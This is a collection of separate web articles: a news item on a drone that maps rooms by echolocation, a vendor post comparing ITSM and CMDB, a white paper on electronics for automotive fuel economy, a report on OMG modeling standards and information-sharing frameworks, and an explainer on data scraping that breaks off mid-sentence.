Flying Robot Uses Echolocation for Search and Rescue Operations The small-scale robot uses a buzzer and microphones to build a map of its environment Echolocation could help small flying robots navigate their surroundings, much like bats, in a development researchers hope could help robot deployment in search and rescue missions. The team of researchers, from Canada's University of Toronto and the Swiss Federal Institute of Technology, used a small microphone and speaker to give a robot echolocation capabilities. In tests, the robot’s speaker lets out bursts of sound at different frequencies which bounce off the robot’s surroundings and are recorded by the microphone. An algorithm then interprets the sound waves to make a virtual map of the environment. In trials, the flying robot could map walls with up to 0.7-inch accuracy from 1.6 feet away when stationary, and with 3.1-inch accuracy when airborne. “For safe and efficient operation, mobile robots need to perceive their environment, and in particular, perform tasks such as obstacle detection, localization, and mapping,” the team said. “We propose an end-to-end pipeline for sound-based localization and mapping that is targeted at, but not limited to, robots equipped with only simple buzzers and low-end microphones. The method is model-based, runs in real time, and requires no prior calibration or training.” The team’s model also avoids the need for bulky or heavy hardware often unfeasible for installation on a small-scale robot. Possible use cases include search and rescue missions and reaching hard to access areas that may be cut off from light. While the team found the model was not as accurate as those with hardware systems including GPS or camera arrays, plans are underway to continue finetuning the design to improve accuracy. One day, the team said it hopes the robot can echolocate using only its own noises (such as its propeller whirring), rather than having to emit sounds. About the Author You May Also Like
<urn:uuid:813b7df5-a87f-49de-93c2-32088d8219e2>
CC-MAIN-2024-38
https://www.iotworldtoday.com/robotics/flying-robot-uses-echolocation-for-search-and-rescue-operations
2024-09-09T13:01:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651098.19/warc/CC-MAIN-20240909103148-20240909133148-00360.warc.gz
en
0.949664
426
3.484375
3
Have you ever found yourself confused by the overlapping terms in IT Management? This article will clarify these concepts, starting with their definitions and highlighting how they interconnect. By the end of this read, you’ll gain insights into how these elements work together to improve your organization’s IT landscape. Let’s dive in! What is Information Technology Service Management (ITSM)? Brief explanation IT Service Management is a comprehensive approach that encompasses the planning, delivery, management, and improvement of IT services within an organization. It focuses on aligning IT services with the needs of the business and ensuring that IT supports business objectives effectively. ITSM encompasses various processes, including Incident Management, Problem Management, Change Management, and Service Request Management, all aimed at enhancing customer satisfaction and optimizing service delivery. At its core, ITSM is about creating value for customers through effective Service Management practices. This involves not only delivering IT services but also continuously improving them based on feedback and changing business requirements. By implementing ITSM frameworks, organizations can streamline their operations, reduce service costs, and improve overall efficiency. The Definitive Guide to ITSM Frameworks [+Free Downloadable Cheat Sheet] What is Configuration Management Database (CMDB)? A Configuration Management Database (CMDB) is a centralized repository that stores information about the configuration items (CIs) within an organization’s IT infrastructure. CIs can include hardware, software, network components, and other critical assets that need to be managed to ensure effective service delivery. Within IT Asset Management, the CMDB acts as a comprehensive visual map of these components, their relationships, and their configurations. The CMDB is an integral part of ITAM, which refers to the processes involved in managing IT assets throughout their lifecycle. ITAM focuses on tracking and managing the financial, contractual, and inventory aspects of IT assets, ensuring that organizations maximize their value while minimizing risks. By integrating ITAM with a CMDB, organizations can gain a holistic view of their IT environment, enabling better decision-making and risk management. CMDB Definition, Benefits, And Best Practices ITSM, CMDB: How are they different? While ITSM and CMDB are interconnected, they serve different functions within an organization. Understanding these differences is crucial for effective IT management. 1) Purpose and focus ITSM is primarily concerned with the overall management of IT services, focusing on delivering value to customers and improving service quality. It encompasses various processes that ensure IT services are aligned with business needs. CMDB, on the other hand, serves as a repository for configuration data, focusing on the relationships and dependencies between various CIs. It provides the necessary information to support ITSM processes, enabling organizations to manage their IT environment effectively. 2) Data Management In ITSM, data is used to inform Service Management processes, such as incident resolution and change management. ITSM tools leverage data from the CMDB to make informed decisions about service delivery. The CMDB stores detailed information about each CI, including attributes, relationships, and dependencies. This data is crucial for understanding how changes to one component can impact others, thereby supporting effective incident and change management. 4) Integration with other processes ITSM integrates various processes, including incident management, problem management, and change management. It aims to create a seamless flow of information and collaboration among IT teams to enhance service delivery. The CMDB acts as a central repository that feeds data into these ITSM processes, ensuring that teams have access to accurate and up-to-date information when making decisions. This integration is essential for minimizing downtime and improving overall service quality. 5) Impact on business operations ITSM directly impacts customer satisfaction by ensuring that IT services meet business needs and expectations. By focusing on service quality, organizations can enhance their reputation and build stronger relationships with customers. The CMDB supports ITSM by providing visibility into the IT landscape, enabling organizations to assess risks, troubleshoot issues, and plan for changes effectively. This visibility is critical for maintaining service continuity and minimizing disruptions. 6) Role in Compliance and Risk Management ITSM processes often require compliance with industry standards and regulations. Effective ITSM practices help organizations demonstrate compliance and manage risks associated with service delivery. The CMDB plays a vital role in Compliance Management by tracking changes and maintaining accurate records of configuration items. This capability allows organizations to identify unauthorized changes, ensuring that they can respond promptly to potential security and regulatory risks. Why is Configuration Management Database important? The importance of a CMDB cannot be overstated. It serves as the backbone of effective IT Service Management and Asset Management, providing organizations with several key benefits: Enhanced visibility: A CMDB offers a comprehensive view of the IT infrastructure, enabling organizations to understand the relationships between various components. This visibility is crucial for effective decision-making and risk assessment. Improved Incident Management: By providing detailed information about CIs and their interdependencies, a CMDB helps IT teams respond more effectively to incidents. Teams can quickly identify affected components and implement appropriate solutions, minimizing downtime. Support for Change Management: The CMDB enables organizations to assess the impact of changes on the IT environment. By understanding how changes will affect various components, organizations can plan more effectively and reduce the risk of disruptions. Facilitating root cause analysis: When incidents occur, the CMDB provides valuable data that can help teams perform root cause analysis. By understanding the relationships between CIs, teams can identify the source of issues more quickly and implement corrective actions. Regulatory compliance: Maintaining accurate records of configuration items is essential for compliance with industry regulations. A CMDB helps organizations track changes and ensure that they can demonstrate compliance when required. Asset Management software solutions Organizations need robust Asset Management solutions to manage their IT assets effectively. They provide the tools necessary to track, manage, and optimize IT assets throughout their lifecycle. These solutions often integrate with a CMDB to provide a holistic view of the IT landscape. By combining Asset Management with Configuration Management, organizations can ensure that they have accurate and up-to-date information about their IT assets and their relationships. Introducing InvGate Insight InvGate Insight is a powerful Asset Management solution that helps organizations manage their IT assets effectively. With its user-friendly interface and robust features, InvGate Insights simplifies the process of tracking and managing assets, enabling IT teams to focus on delivering value to the business. One of the standout features of InvGate Insights is its integration with a CMDB. This integration allows organizations to maintain a centralized repository of configuration data, ensuring that they have access to accurate information when making decisions. By leveraging InvGate Insights, organizations can enhance their Asset Management processes and improve overall service delivery. Plus, it natively integrates with the ITSM solution InvGate Service Desk. This ensures that all configuration item-related data and the CMDB is accurate and up-to-date, facilitating efficient Incident, Problem, and Change Management, and thereby improving overall ITSM and compliance. How can InvGate Insight help? InvGate Insights offers several key benefits that make it an essential tool for organizations looking to optimize their Asset Management processes: Centralized repository: By maintaining a centralized repository of configuration data, InvGate Insights ensures that IT teams have access to accurate and up-to-date information about their assets and their relationships. Improved visibility: The software provides a comprehensive view of the IT landscape, enabling organizations to understand the interdependencies between various components. This visibility is crucial for effective decision-making and risk assessment. Streamlined Incident Management: With detailed information about configuration items, and through its integration with the service desk, InvGate Insight helps IT teams respond more effectively to incidents. Teams can quickly identify affected components and implement solutions, minimizing downtime. Enhanced Change Management: The integration with a CMDB allows organizations to assess the impact of changes on the IT environment. By understanding how changes will affect various components, organizations can plan more effectively and reduce the risk of disruptions. To sum up In conclusion, understanding the differences between ITSM and CMDB is essential for effective IT management. While ITSM focuses on delivering value through Service Management processes, the CMDB serves as a centralized repository of configuration data that supports these processes. By leveraging a CMDB, organizations can enhance their visibility into the IT landscape, improve incident and change management, and ensure compliance with industry regulations. As organizations continue to evolve in the digital age, the importance of effective Asset Management and service delivery cannot be overstated. By integrating ITSM with a robust CMDB, organizations can optimize their IT operations and drive business success. Frequently Asked Questions 1. What is the main purpose of ITSM? ITSM focuses on the planning, delivery, management, and improvement of IT services within an organization, ensuring that IT supports business objectives effectively. 2. How does a CMDB support ITSM processes? A CMDB provides a centralized repository of configuration data that informs ITSM processes, enabling organizations to manage their IT environment effectively and make informed decisions. 3. Why is a CMDB important for organizations? A CMDB enhances visibility into the IT infrastructure, improves incident and change management, facilitates root cause analysis, and supports regulatory compliance. 4. How can InvGate Insights help with Asset Management? InvGate Insights offers a centralized repository of configuration data, improved visibility into the IT landscape, and streamlined incident and change management processes, helping organizations optimize their Asset Management practices.
<urn:uuid:ee5b4618-616d-45b7-869c-1b550ebe4c7c>
CC-MAIN-2024-38
https://blog.invgate.com/itsm-cmdb
2024-09-10T17:27:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00260.warc.gz
en
0.926252
1,951
2.75
3
What is the biggest difference between humans and animals? This question has been asked many times, evoking a range of different answers. "Being able to use tools" is one of the most frequently cited differences. However, it was found that in fact there are animals that use objects such as stones or twigs to catch prey, in some cases even shaping these objects before use. So the description of the difference has been amended to "Only humans create tools to make other tools." Be that as it may, it certainly can be said that the advancement of humanity and the progress of civilization was driven by the discovery and continuous improvement of tools. And in our modern age, many of these tools are being made more convenient, more powerful, and more functional by the application and evolution of electronics technology. ■Cars and electricity have been closely linked from the start A prime example of this development is the automobile. Even in its earlier stages, the car would not have been possible without electricity. The internal combustion engine requires an electrical spark from a spark plug to ignite the fuel, and without the electric starter motor, even getting the engine to run would be a major undertaking. Without headlights or windshield wipers, the car could not drive at night or in the rain, and without brake lights or winkers, the number of collisions would certainly rise. We can categorize these types of equipment as "electrical equipment necessary for moving the car." Electrical equipment commonly used in automobiles On the other hand, the value of the car as a product has increased through the addition of electrical equipment that makes driving more pleasurable, such as air conditioning, car audio systems, car navigation systems, etc. Various sensors are indispensable for electronic systems controlling the engine and other aspects of the car. In recent years, it has become more common to take some of the information provided by these sensors and present it to the driver in an easy to grasp format, thereby contributing to more efficient and better driving. For example, an indicator that directly shows the actual fuel consumption at any moment helps enormously with realizing fuel economy, and indicators showing the timing for oil changes and other necessary actions help to keep the car in optimum condition. A system that warns the driver when the external temperature drops below three degrees centigrade alerts him or her to the possibility of road surface freezing. Recently, some manufacturers equip their cars with systems that can analyze driving patterns and provide guidance for safe and economical driving. Tire pressure warnings, anti-lock braking systems (ABS), electronic slip control (ESC), collision prevention systems and similar features that contribute actively to driving safety are being increasingly included as standard equipment. We may call this category "electrical equipment for comfort and safety." Over the course of the past twenty years or so, the importance of new electronics technologies has increased notably. In order to preserve the earth's environment and resources, improving the fuel economy of cars has become a critical and pressing goal, and electronic systems that directly contribute to better performance are attracting wide interest. Developments in this field began in the mid-1970s, starting with electronic control for ignition and fuel systems. What originally had been performed by purely mechanical means now was put under electronic control, resulting in drastically improved flexibility. Suddenly, it became possible to adjust the amount of fuel supplied to the engine as well as the ignition timing over a much wider range. This in turn enabled designers to successfully combine output performance with cleaner exhaust emissions. Nevertheless, until about ten years ago, a car with a displacement in the 2-liter class consumed about 1 liter of fuel for every 10 kilometers when driving in an urban environment. By contrast, cars in the same class these days habitually get about 15 to 20 kilometers per liter. The biggest reason why this improvement in fuel economy came about is the impending introduction of fuel economy standards worldwide, such as the CAFE (Corporate Average Fuel Efficiency) standard. If average fuel consumption figures calculated on the basis of every car sold by a manufacturer do not meet certain CAFE standards, the manufacturer's name may be made public, penalties may apply, or a limit may be imposed on the number of cars that can be sold. Because this affects especially manufacturers with high sales figures for large and luxurious cars that tend to consumer more fuel, there is strong pressure on improving the fuel economy of all models in a company's lineup. ■Electronics technologies helping to improve fuel economy There are largely four different approaches to improve the fuel economy of an automobile. The first is improving the fuel performance of the engine itself. The second approach involves assistive systems or devices that provide improvements in areas where the engine is not good at. Third is the reduction of air resistance while the car is driving. And finally, there is reduction in the weight of the automobile. Two of these approaches are intricately linked to electronics technology. Electrical equipment for improving the fuel performance of an engine The first task is improving the fuel performance of the engine itself. In fact, there is not all that much than can be done in this area. The three possible aspects are "improved combustion," "reduced resistance," and "reduced losses." And for each of these, electronics technology presents an effective solution. A representative example of an effective technology for improving combustion is known as the variable valve lift and timing system. A fuel air mixture is introduced into an internal part of the engine called the cylinder. It is then compressed and made to ignite, allowing the retrieval of kinetic energy. When combustion is finished, the remaining gas is expelled to the outside, and the process starts all over again. During the compression and combustion phases, the cylinder must be tightly sealed, but to allow the introduction of air, the so-called intake valve must be opened, while the exhaust valve must be opened in order to release the exhaust gas. The amount of air that can be introduced and expelled depends on the open/close timing of the valve as well as on the degree to which it is opened, which is called lift. The parameters for optimal valve open/close timing and valve lift differ significantly according to the actual driving conditions of the car. In combustion engines of about 20 years ago, the valve open/close timing was governed by a mechanical arrangement with a fixed operation scope. If lift and timing were optimized for the relatively low engine speeds prevalent under normal driving conditions, the engine could not really be driven into high rpms, resulting in an engine that was considered to be deficient in power. This limitation was removed by the introduction of variable valve timing systems, allowing the open/close timing to be adjusted according to engine speed. While early systems used a simple hydraulic mechanism capable of switching only between two stages, this has been progressively replaced by continuously variable systems driven by an integrated electric motor or similar, thereby allowing detailed and continuous control over valve timing. The powerful modern engines of today with good fuel economy would not be possible without this development. Increasingly, such systems not only control the open/close timing, they also allow adjustment of valve lift, resulting in complex systems known under names such as "continuously variable valve lift and timing." Different manufacturers employ different construction principles, but the use of oscillating cams controlled by stepping motors or similar is the most common approach. Also, in order to ensure that the open/close timing of valves is always optimal, the condition of various parts of the engine must always be monitored very closely and accurately. For this purpose, a large number of sensors are mounted to provide data about temperature, pressure, and other engine parameters. These data assist the variable system to achieve the best timing for the current situation. The sensor information is also used for integrated control of ignition timing and fuel injection timing by an ECU. The high performance of modern sensors, combined with the high performance of the control systems, is what enables modern engines to deliver both high output power and maintain good fuel economy. The next aspect is reduced resistance. The most effective way to achieve this is increasing the precision of the parts that make up the engine. Another effective measure is to substitute electric power for driving accessories that used to be driven directly by the engine. A prime example for this approach is the water pump that circulates coolant between the engine and the heat exchanger. In older style engines, a part of the output was used to drive the pump directly, but by driving the pump electrically, the resistance during engine operation can be reduced. Designing accessories to operate electrically makes it possible to have them function on demand, that is only when needed. This also helps to reduce resistance. A mechanical water pump itself is not equipped with a means for flow control. Rather, it is always operating and coolant temperature is adjusted by a thermostat. An electric water pump on the other hand can be made to operate only when a change in coolant temperature is required, thereby preventing unnecessary transfer of thermal energy to the coolant. Cars equipped with an automatic function to turn off the engine when idling use a dedicated electric oil pump for generating the required hydraulic pressure while the engine is stopped. This can also be considered as an aspect that contributes to enhanced fuel economy. ■Hybrid: a smarter solution Finally, consider the possibilities for fuel economy improvement through assistive devices other than the combustion engine. When starting to move from the stopped condition, or when accelerating rapidly, a car requires a high amount of power. However, at other times, such as when driving at a constant speed for an extended period of time, the power required is said to be only on the order of some 30 kW. By selecting an engine with a smaller displacement and therefore better basic fuel economy, and only providing additional power from an electric motor when higher power for acceleration is required, one gets a hybrid vehicle. Until quite recently, hybrid configurations could be divided into two main types: "using an electric motor to allow the combustion engine to operate always in its efficient range" and "assisting the combustion engine in its weaker range with an electric motor." More complex hybrid configurations have appeared recently, but the basic fact that an electric motor in conjunction with a combustion engine is used to improve fuel economy still applies. In addition, features such as regenerative braking, turning off the engine when stopped, and EV drive mode also help to save fuel. A new type of hybrid power unit Hybrid vehicles with simpler configurations than current designs will probably make their appearance before long. In particular for cars with a transverse combustion engine and front-wheel drive, a hybrid configuration where the output of the electric motor is introduced to the final gear reduction unit is expected to become widely adopted. This configuration offers a number of advantages, such as the fact that it is relatively easy to realize also in lower priced models, and weight increase can be kept to a minimum. It is certain that automotive engines will be designed to interact even more closely with electric motors in future. For example, in the pinnacle of motor sports, the F1 power unit will employ a so-called MGU-H (Motor Generator Unit - Heat) configuration from 2014. MGU-H is a combination of turbo charger and generator. At low revolution speeds, when the engine exhaust power is low, the generator functions as a motor that quickly increases the revolution of the turbo charger. As soon as the turbo charger revolution speed is high enough, the generator produces electricity for charging the battery bank of the drive assist system. Because this allows the combination of even higher fuel efficiency with high output power, the concept is garnering worldwide attention and may come to represent a new racing engine generation. MGU-H system to be incorporated in F1 engines from 2014 The progress of automobile engines from now on is intricately linked to electric motors, sensors, and microcontrollers. The combination of these elements working together in unison has reached a level that in effect could be called "robotic." The increasing sophistication of car electronics technology makes cars more intelligent and smart, acting as a motivating force towards exploring new frontiers.
<urn:uuid:f8e833ed-123e-4dfa-969d-51a0e209a51d>
CC-MAIN-2024-38
https://www.mbtmag.com/home/whitepaper/13249639/tdk-corporation-of-america-how-electricity-drives-automobile-progress-part-1-electric-motors-working-behind-the-scenes-for-better-fuel-economy
2024-09-11T23:15:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00160.warc.gz
en
0.95681
2,444
3.015625
3
How do standards grow? “It all starts with standards – they are at the heart of interoperability,” Canada’s Director of Digital Exchange Teresa D’Andrea concluded, as she summarized the government use case at the OMG’s Technical Meeting in Ottawa. But these must be highly consumable (take no more than 30 minutes for a technologist to understand) to drive usage. The OMG consortium has internalized this fundamental principle in its standards work through adoption of a models-driven approach. As Ed Seidewitz, CTO of OMG member company Model Driven Solutions, explained at the Ottawa session, “a model is recognizable. It faithfully represents some things, but not everything. By describing something under study, it promotes understanding, and specifies what needs to be built.” A modeling language, by extension, is a formal language for writing models, written as a set of statements that describe a system (for analysis), and describe requirements (for engineering). As examples, Seidewitz pointed to mathematics as the modeling language for scientific models, and programming language as the modeling language for computation. OMG’s mandate has been to develop standards for modeling languages as these provide “common understanding”: “its important to standardize,” he explained, “in order to communicate.” OMG’s first standard – the Unified Modelling Language (UML) – was created in 1997 as the technical basis for designing and communicating distributed systems. Since then, OMG has developed specific profiles for UML based on different technical use cases, such as timing and integration and business processes. Ultimately, two families of standards have been created for the analysis, design and implementation of software-based systems, and for modeling business and similar processes. On the software side, these now include: SysML for Systems Engineering; MARTE for the Modeling and Analysis of Real Time Embedded Systems; SoaML, the Service Oriented Architecture Modeling Language, UAF, Unified Architecture Framework; fUML, the Foundational Subset for Executable UML Models, Alf, the Action Language for fuML, and PSCS, precise Semantics for UML. On the business front, the Business Process Model and Notation specification (BPMN), which is now also a recognized ISO standard, is a graphical notation for business processes that defines notation and semantics in diagrams for Process Orchestration and Choreography, Collaboration, Conversation (detailed messaging on how processes in choreography talk to each other). Other business process specifications include CMMN – Case Management Model and Notation (a common meta model and notation for modeling and graphically expressing a case) and DMN – Decision Model and Notation (describes how to make decisions to enable automation, and VDML (Value Definition Modeling Language). Since this (abbreviated!) list of different technical and business process specifications fails the test of ‘easily consumable’, Seidewitz provided Ottawa Technical Meeting attendees with an example scenario – the use of UML business process framework to create an online shopping experience. He began with a schematic diagram outlining various functional processes needed to support the primary actor (the customer), and the relationships between bubbles representing the customer and secondary actors (vendor, authenticator, shipper) in the shopping process. Over this, Seidewitz overlay a UML activity diagram, shifting to a shopping system architecture using a composite structure diagram showing IT subsystems (components, such as search engine, management component, online shopping, authentication, customer management, order management, inventory management). As a next step, he defined the interfaces between components, and paths for communications via nodes to create a design. Using a sequence diagram that focuses on the lifelines – or messages that are passed between components – he was able to model the interaction between components, to complete the architecture. According to Seidewitz, “modeling helps you to find problems in your system – missing interfaces, for example – and you can check each use case scenario, and then validate the design (or potentially add in the missing interface!).” The Holy Grail, he noted in a systems engineering use case for optimizing vehicle manufacture, is to create a “system of systems” with traceability and plug in capabilities that allow designers to quickly check and modify system design. Scaling standards efforts As he outlined UML evolution, Seidewitz also discussed the process for setting research/work priorities in standards development. He explained that the OMG organizers rely on the community to decide what research is necessary next and he urged members to join one of these task forces – these would assess development efforts and assess needs, and then would issue an RFP inviting community members to come together to work on a specific industry issue. At the Ottawa Meeting, several OMG members presented on work completed in one or more areas through leverage of the models-based approach and use of one or more specification to solve for a new issue. For example, Nick Mansurov, CTO at KDM Analytics, reported on progress made by the Systems Assurance Task Force on development of the Model-based Cybersecurity Assessment. His talk focused on the use of MBCA with the Unified Architecture Framework (UAF) to identify, analyze, classify and understand cybersecurity threats – and how by plugging UAF into risk analysis, it is possible to automate the processes for repeatable security assessment. In his presentation, Denis Gagné, CTO and CEO, Trisotech, described application of the OMG “Triple Crown,” the three complementary business process standards BPMN, CMMN and DMN to build continuous operational process improvement. Within the BPMN specification, he explained, each shape has one meaning, and because there is universal graphical notation for drawing business processes, a diagram can automate the creation of executable code, bridging the gap between modeling and subsequent action. A circle means an event, a rectangle is an activity, and a diamond is a gateway – which together can describe process sequence flow. According to Gagné, “It’s simple, but powerful because the business user can quickly understand the model – this flowcharting is an abstraction that is pretty natural and a good way to communicate with business,” who are the ultimate process owners. Another business focused presentation was made by Claude Baudoin, principal consultant at cébe IT and Knowledge Management, who reported on preliminary definitions work that has been developed in two discussion papers published by the OMG Data Residency Working Group. The goal of this group is to create standard definitions of regulations in various jurisdictions and to define sensitive data so that tools can be developed that would better manage the movement of data from one location to another. Another aim is to establish process around data governance. Baudoin argued for establishment of a detailed governance structure, with clear roles and responsibility – “if everyone’s in charge, no one is in charge,” he added – as well as proper metadata management based on defined processes and rules on sensitive information. For his part, John Butler, principal at Auxillium Technology Group, discussed early efforts by the OMG Provenance and Pedigree Working Group, to establish standards for tracking and exchanging information that can identify the provenance of digital and physical artefacts, as well as their lineage (who touched the data during processing). This information will play an increasingly important role in the development of data trust, which applies across a range of applications, such as maritime safety (the working group’s original research area), supply chain, citations and fake news, electronic health records, records management, quality assurance and the use of test data. The group’s proposed Information model will include areas such as ownership of the data, custody, origin, transformation, and the identification of roles in the ecosystem. Support for Canadian innovation As the task force activities described above show, much of the OMG’s current group work is designed to support the creation of standards and best practices in information management. This is not surprising, given data growth in the last decade and our increasing focus on deriving value from information assets. In the data value proposition, sharing occupies a critical space – data that is stored in siloed repositories rarely delivers on its full potential benefit. But at the same time, data must be secured. In a session on Data Tagging and Labelling, Mike Abramson, CEO of the Advanced Systems Management Group, spoke to potential for conflict between open and secure data. Citing the former director of US National Intelligence James Clapper, Abramson pointed to “the need to find the sweet spot between sharing and protecting information. This paradox exists in every domain where sensitive information needs to be shared and used: in open data, open government, public safety, healthcare, and financial services.” According to Abramson, the answer lies in “Responsible Information Sharing,” which maximizes sharing while simultaneously safeguarding sensitive data. The key, he argued, lies in metadata, in the creation of the Information Exchange Framework (IEF), which applies different types of contextual tags (descriptive, structural, administrative, provenance and pedigree, security, discovery, and handling instructions) to enforce policy around information sharing and security. Advanced Systems Management Group’s work in this area began 25 years ago, and the firm’s engagement to help manage the sharing of NATO coalition data between US, the UK, and Turkey helped Abramson to recognize that “what you are willing to share,” in this kind of scenario, “is problematic.” Similarly, data transfer was challenging: “Originally, information managers were hardcoding their integrations, their APIs. But after six months, they had no idea what their interfaces were doing, and their interfaces never survived ‘first contact’ with the enemy. They had no way of updating them in a timely manner.” To enable information sharing, Abramson looked first for an existing interface application that would support integration. Since none existed, his team began to develop a modeling technique, a profile for UML to see if this could be used to generate interfaces. Their solution involved applying metadata in real time, ingest rules with data, and managing this in run time. To prove out this approach, Advanced Systems developed a technology demonstration for Public Safety and Security in Shared Services Canada, however, at that time no pilot mechanisms existed in the Canadian government, save for limited, specialized applications in the National Research Council. Abramson’s team, however, was able to work on this broad interoperability challenge with the support of the OMG community. Led by Abramson, members in the OMG Command, Control, Communications, Collaboration and Intelligence Domain Task Force and the IEF Working Group have designed the IEF, a framework and reference architecture based on open standards for policy driven, data-centric and user-specific Information sharing and safeguarding (ISS), which delivers defence in depth to the data layer, responsible information sharing, delivery of the right/quality information to the right decision maker at the right time, and day-0 capability. The first IEF specification, the IEPPV, has also been published – a policy vocabulary and UML profile for secure packaging and processing of structured information elements. The IEF is platform independent – it may be implemented using one or more vendor products and services that can be integrated through standardized interfaces, messages and protocols. Abramson explained: “In our metadata, the way we build the models, aggregate, and transform, we can mark in real time labelling and tagging of data. We can redact – we can pull out pieces that individuals can’t see. The recipient may be an individual, or a community of practice, a community of interest. We can control what information that goes to the community. If I’m using an IEPPV-type message, I have one definition of the message and it’s the content of the message that I’m controlling not the structure of the message. That’s where the innovation lies.” Furthermore, “we can control content to the individual recipient based on their authorizations and role, based on what the data owner determines is the risk. I separate the policies from the executable (a router or a database, for example) and manage them separately. Which means I can deploy my tech, and configure my tech for my mission.” Since it is managed through policy, an IEF database can automate design-time ISS simulation and analytics assessments, triggering changes that might be required through out all associated elements. In addition, there is also an administrative interface that allows the user to go in and change and administer the policies. The result, according to Abramson, is increased flexibility, agility and adaptability on the information sharing front, as well as reduced cost and risk in information management overall. And because the IEF is model driven (not just code), users are able to retain institutional membership in the standards ecosystem to take advantage of new adaptations/and extensions going forward. “This technology is all Canadian innovation,” Abramson explained, modeled, polished and finalized with the help of the broader community. The Advanced Systems Management Group experience highlights the key advantages of standards ecosystem development, as described by OMG CEO Richard Soley. While existing UML specifications helped the group replace a complex, point-to-point approach to API development with more readily accessible profile development of an existing specification, it has also simplified integration and data exchange for users, while introducing new safeguards for data. And by easing the development of best practices and standards, OMG is providing the supports needed to simplify and scale the innovation process itself. As Soley noted, the aim of the working groups is to identify “the new requirements for new standards that we can deliver … that will make it easier the next time a product/solution gets built. This is really about inventing the future, rather than waiting for the future to be upon us and disrupt our businesses.”
<urn:uuid:4964bd2f-0268-41ec-ac7a-edd519d0004d>
CC-MAIN-2024-38
https://insightaas.com/standards-anatomy-pt-2-easing-consumption-to-drive-adoption/
2024-09-18T01:25:24Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00560.warc.gz
en
0.938547
2,897
2.59375
3
Data scraping is the process of extracting large amounts of data from publicly available web sources. The data is cleaned and prepared for processing and used by businesses for everything from lead generation and market research to consumer sentiment analysis and brand, product, and price monitoring. Because there are ethical and legal concerns around data scraping, it’s important to know what’s fair game and what’s not. This article explains the process, techniques, and use cases for data scraping, discusses the legal and ethical ramifications, and highlights some of the more common tools. What is Data Scraping? Data scraping—especially on a large scale—is a complex process involving multiple stages, tools, and considerations. At a high level, data scraping refers to the act of identifying a website or other source that contains desirable information and using software to pull the target information from the site in large volumes. Sources for data can range from e-commerce sites and social media platforms to public databases and product review sites. Targeted data is usually text-based. Data scraping generally targets structured data from databases and similarly structured formats. Web scraping is a kind of data scraping that targets and extracts unstructured data from web pages. As more businesses become reliant on data analytics for operations, business intelligence, and decision-making, the demand for both raw and processed data is on the rise. Gathering up-to-date and reliable data using traditional methods can be time-consuming and expensive—especially for smaller businesses with limited user bases. Using automated tools to “scrape” data from multiple sources, businesses can cast a wider net for the kind and amount of information they gather. There are a number of approaches to data scraping and a wide variety of tools. Depending on the use case, there are also legal and ethical concerns to keep in mind around what data is gathered and how it is used. How Data Scraping Works Data scraping is done using code that searches the website or other source and retrieves the sought-after information. While it’s possible to write the code manually, numerous programming libraries—both free and proprietary—contain prewritten code in a number of programming languages that can be used to automate the task. The programmer defines search criteria that tells the code what to look for. The code then communicates with the targeted data source by sending countless requests for data, interpreting the source’s response, and meticulously sifting through those responses to pick out the data that meets the criteria. Results can include databases, spreadsheets, or plain text files, for example, which can all be further cleaned for analysis. Popular Data Scraping Techniques Data can be scraped in more than one way—while no technique is outright better than another, each tends to work best in the specific scenario for which it was designed. Here’s a look at some of the most popular data scraping techniques. Application programming interfaces, or APIs, are considered direct bridges between online websites or applications and outside communicators. Many websites with high-density data offer free or paid access to their own, integrated APIs, letting them provide data access while controlling how and how often site data is scraped. If a website or application has an API, it’s best to use it over any alternative scraping method. API access ensures consistency and reduces the risk of violating the website’s terms of service (ToS). This is particularly important when scraping user-generated data on social media platforms, as some of it may be protected under personal information privacy laws and regulations. DOM parsing makes it possible to more interactively select which elements to scrape using class names, IDs, or nested relationships. It also ensures that the relations and dynamics between the various data points aren’t lost in the extraction process. In HTML parsing, the data scraping tool reads the target web page’s source code, usually written in HTML, and extracts specific data elements that might not otherwise be accessible using another technique—for example, distinguishing data based on tags, classes, and attributes. HTML parsing enables users to more easily navigate the complex structure of a website, granting access to as much data as possible and ensuring precise and reliable extraction. Vertical aggregation is a specialized type of data scraping that works as a more comprehensive approach across various websites and platforms in the same niche. Instead of scraping a wide set of data once, vertical aggregation lets you focus data scraping efforts over a set period of time. For example, vertical aggregation could be used to scrape job listings from different employment sites or the change in prices and discounts on e-commerce sites. The collected data is up-to-date and best used to support decision-making processes in niche-specific data fields. Data Scraping Use Cases Accurate, up-to-date data is a goldmine of knowledge and information for enterprises. Depending upon how it was processed and analyzed, it can be used for a wide range of purposes. Here are some of the most common business use cases for data scraping. Brand, Product, and Price Monitoring For businesses that want to keep watch over their brand and products online as well as their competitors’ brands and products, data scraping provides a high-volume means of monitoring everything from social media mentions to promotions and pricing information. Using data scraping to gather up-to-the-minute data allows them to adjust and adapt strategies in real time. Consumer Sentiment Analysis The success of products and services can hinge on consumer perceptions. By scraping reviews, comments, and discussions from online review sites and platforms, businesses can gauge the pulse of the consumer. Aggregating this data paints a clearer picture of overall sentiment—positive, neutral, or negative—to assist companies in refining their offerings, addressing concerns, and amplifying strengths. It acts as a feedback loop, helping brands maintain their reputation and cater better to their consumer base. Automating the extraction of data and insights from professional networks, directories, and industry-specific websites gives businesses a valuable way to find clients and customers online. This proactive approach facilitates outreach by giving sales and marketing teams a head start. Scraping massive amounts of data and running it through an analytical model enables businesses to connect with the right prospects more efficiently than manually searching potential leads. Having up-to-date and relevant data is paramount to successful marketing. Data scraping lets businesses collect vast amounts of data about competitors, market trends, and consumer preferences. When cleaned, processed, and analyzed for patterns and trends, data can provide insights that drive marketing campaigns and strategies by identifying gaps in the market and predicting upcoming trends. Legal and Ethical Considerations of Data Scraping Data scraping is a broad term that encompasses a lot of different techniques and use cases with varying intent. In the U.S., it’s generally legal to scrape publicly available data such as job postings, reviews, and social media posts, for example. Scraping personal data may conflict with regional or jurisdictional regulations like the European Union’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act. The definition of personal information may vary depending on the policy. The GDPR, for example, forbids the scraping of all personal data, while the CCPA only prohibits non-publicly available data—anything made available by the government is not covered. As a general rule, it’s a good idea to be cautious when scraping personal data, intellectual property, or confidential information. In addition, some websites explicitly state that they don’t allow data scraping. There are also ethical concerns about the 